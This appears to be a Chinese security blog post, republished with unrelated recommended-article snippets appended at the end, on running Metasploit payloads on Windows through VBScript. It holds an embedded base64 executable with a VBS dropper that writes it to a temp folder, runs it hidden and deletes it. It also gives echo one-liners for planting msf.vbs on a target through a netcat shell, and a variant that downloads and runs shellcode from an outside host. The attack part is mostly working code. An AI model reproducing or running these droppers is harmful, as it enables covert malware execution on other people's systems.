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"
Dim GBHMAfCsea
Set GBHMAfCsea = CreateObject("Scripting.FileSystemObject")
Dim nYosrMtHSIOKSTI
Dim LNXsqHXEKZQU
Set nYosrMtHSIOKSTI = GBHMAfCsea.GetSpecialFolder(2)
LNXsqHXEKZQU = nYosrMtHSIOKSTI & "\" & GBHMAfCsea.GetTempName()
GBHMAfCsea.CreateFolder(LNXsqHXEKZQU)
YeQZhbvaLPekFW = LNXsqHXEKZQU & "\" & "QoziwORKliqRDPs.exe"
Dim voFeIDpffjdo
Set voFeIDpffjdo = CreateObject("Wscript.Shell")
WwqoNcaCIbw = oSpLpsWeU(cTENSbYbnWY)
Set WQwWDbhse = CreateObject("ADODB.Stream")
WQwWDbhse.Type = 1
WQwWDbhse.Open
WQwWDbhse.Write WwqoNcaCIbw
WQwWDbhse.SaveToFile YeQZhbvaLPekFW, 2
voFeIDpffjdo.run YeQZhbvaLPekFW, 0, true
GBHMAfCsea.DeleteFile(YeQZhbvaLPekFW)
GBHMAfCsea.DeleteFolder(LNXsqHXEKZQU)
End Function
skbfzWOqR演示:
可以把生成的payload放到服務器,然后再目標系統上執行ps代碼,文章開頭說的遠程下載:
如何以簡單/兼容的方式運行payload?
閱讀代碼,我們可以創建一個名為msf.vbs的簡單的vbs腳本來執行shellcode。 vbs腳本可以在Windows XP / 2003 / Vista / 7/8/10/2008/2012 / ....上執行
shellcode = WScript.Arguments.Item(0)
strXML = "" & shellcode & ""
Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")
oXMLDoc.LoadXML(strXML) decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue
set oXMLDoc = nothing
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
Dim tempdir
Dim basedir
Set tempdir = fso.GetSpecialFolder(2)
basedir = tempdir & "\" & fso.GetTempName()
fso.CreateFolder(basedir)
tempexe = basedir & "\" & "test.exe"
Dim adodbstream
Set adodbstream = CreateObject("ADODB.Stream")
adodbstream.Type = 1
adodbstream.Open
adodbstream.Write decode
adodbstream.SaveToFile tempexe, 2
Dim wshell
Set wshell = CreateObject("Wscript.Shell")
wshell.run tempexe, 0, true
fso.DeleteFile(tempexe)
fso.DeleteFolder(basedir)
Ok, how to run it in cmd.exe ? Do you want to paste the code line by line ? A simple command is created as follow:用一個簡單的命令上傳msf.vbs到目標系統:
echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs用msf.vbs和cscript.exe執行metasploit payload:
C:\Documents and Settings\test\Desktop> cscript.exe msf.vbs <msf-vbs-shellcode>
繞過nc shell緩沖區大小限制
如果腳本在本地主機上的cmd.exe中使用,則一切正常。 但是,如果它在netcat cmd shell中使用,則 payload將被破壞。例如:
C:\Documents and Settings\test\Desktop>cscript.exe %TEMP%\msf.vbs TVqQAAMAA.....AAAAAP
Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.
C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 53) Microsoft VBScript compilation error: Syntax error- origin payload size: 6160
- netcat handle payload size: 4068
請自己嘗試,為了安全測試,另外創建了一個vbs腳本。
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs運行以下命令來執行您的vbs payload:
START /B cscript.exe %TEMP%\msf.vbs http://192.168.1.100:8080/payload.txt
參考來源
- https://github.com/nixawk/psmsf/blob/master/vbsmsf.bat
- http://stackoverflow.com/questions/3205027/maximum-length-of-command-line-string
- https://operatingquadrant.com/2009/09/11/vbs-decoding-base64-strings-in-10-lines-of-code/
- https://social.technet.microsoft.com/Forums/systemcenter/en-US/b8839003-0a8f-4d41-a04a-f09f79103d0e/scom-sp1-groups-classes-and-snmp?forum=operationsmanagerauthoring
- http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html
- http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html
- https://github.com/rapid7/metasploit-framework/blob/c00df4dd712bbc4cfbb9f46d963eb0490094b4de/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
版權聲明:本文為Fly_hps原創文章,遵循 CC 4.0 BY-SA 版權協議,轉載請附上原文出處鏈接和本聲明。
智能推薦
安卓復習.Part4
概念 Fragment 表示 FragmentActivity 中的行為或界面的一部分。可以在一個 Activity 中組合多個片段,從而構建多窗格界面,并在多個 Activity 中重復使用某個片段。可以將片段視為 Activity 的模塊化組成部分,它具有自己的生命周期,能接收自己的輸入事件,并且可以在 Activity 運行時添加或移除片段(這有點像可以在不同 Activity 中重復使用的...
Struts2 Part4
原作者:尚硅谷-佟剛 國際化 i18n.jsp i18n_en_US.properties i18n_zh_CN.properties struts2配置文件 TestI18nAction.java 頁面響應效果:...
SpringBoot part4 day02
軟件開發定律:不超過3S 1.SpringBoot高級用法 1.1關于配置文件的說明: 1.1.1properties文件說明 1.1.2 yml文件說明 修改編碼集: 1.2為屬性賦值 A 直接賦值 1.2.1業務需求 有時需要動態的獲取屬性的值,如果直接寫到代碼中需要重新打包編譯,代碼的耦合性較高. 能否利用配置文件的方式,動態的為屬性賦值? 1.2.2YML方式為屬性賦值 B YML文件賦值...
SpringBoot part4 day05
1.商品分類的展現 1.1業務描述 controller 1.2 樹形控件 樹控件讀取URL。子節點的加載依賴于父節點的狀態。當展開一個封閉的節點,如果節點沒有加載子節點,它將會把節點id的值作為http請求參數并命名為’id’,通過URL發送到服務器上面檢索子節點。 1.用戶在默認條件下 如果沒有展開子節點,則不會發送請求. 2.當用戶打開封閉的節點時,則會將改節點的ID...
SpringBoot part4 day06
@Mapper 接口交給Spring容器管理 也可以在主啟動類上添加@MapperScan(" ") 1.實現商品詳情的展現 1.1業務說明 一般用戶查詢商品時,只需要展現商品想關信息即可,如果用戶點擊某個商品時點擊詳情才會顯示商品詳情信息,因為商品詳情屬于大字段信息,檢索相對較慢,浪費性能 表設計說明: 1.tb_item商品表 2.tb_item_desc商品詳情表 1.1...
猜你喜歡
freemarker + ItextRender 根據模板生成PDF文件
1. 制作模板 2. 獲取模板,并將所獲取的數據加載生成html文件 2. 生成PDF文件 其中由兩個地方需要注意,都是關于獲取文件路徑的問題,由于項目部署的時候是打包成jar包形式,所以在開發過程中時直接安照傳統的獲取方法沒有一點文件,但是當打包后部署,總是出錯。于是參考網上文章,先將文件讀出來到項目的臨時目錄下,然后再按正常方式加載該臨時文件; 還有一個問題至今沒有解決,就是關于生成PDF文件...
電腦空間不夠了?教你一個小秒招快速清理 Docker 占用的磁盤空間!
Docker 很占用空間,每當我們運行容器、拉取鏡像、部署應用、構建自己的鏡像時,我們的磁盤空間會被大量占用。 如果你也被這個問題所困擾,咱們就一起看一下 Docker 是如何使用磁盤空間的,以及如何回收。 docker 占用的空間可以通過下面的命令查看: TYPE 列出了docker 使用磁盤的 4 種類型: Images:所有鏡像占用的空間,包括拉取下來的鏡像,和本地構建的。 Con...
requests實現全自動PPT模板
http://www.1ppt.com/moban/ 可以免費的下載PPT模板,當然如果要人工一個個下,還是挺麻煩的,我們可以利用requests輕松下載 訪問這個主頁,我們可以看到下面的樣式 點每一個PPT模板的圖片,我們可以進入到詳細的信息頁面,翻到下面,我們可以看到對應的下載地址 點擊這個下載的按鈕,我們便可以下載對應的PPT壓縮包 那我們就開始做吧 首先,查看網頁的源代碼,我們可以看到每一...
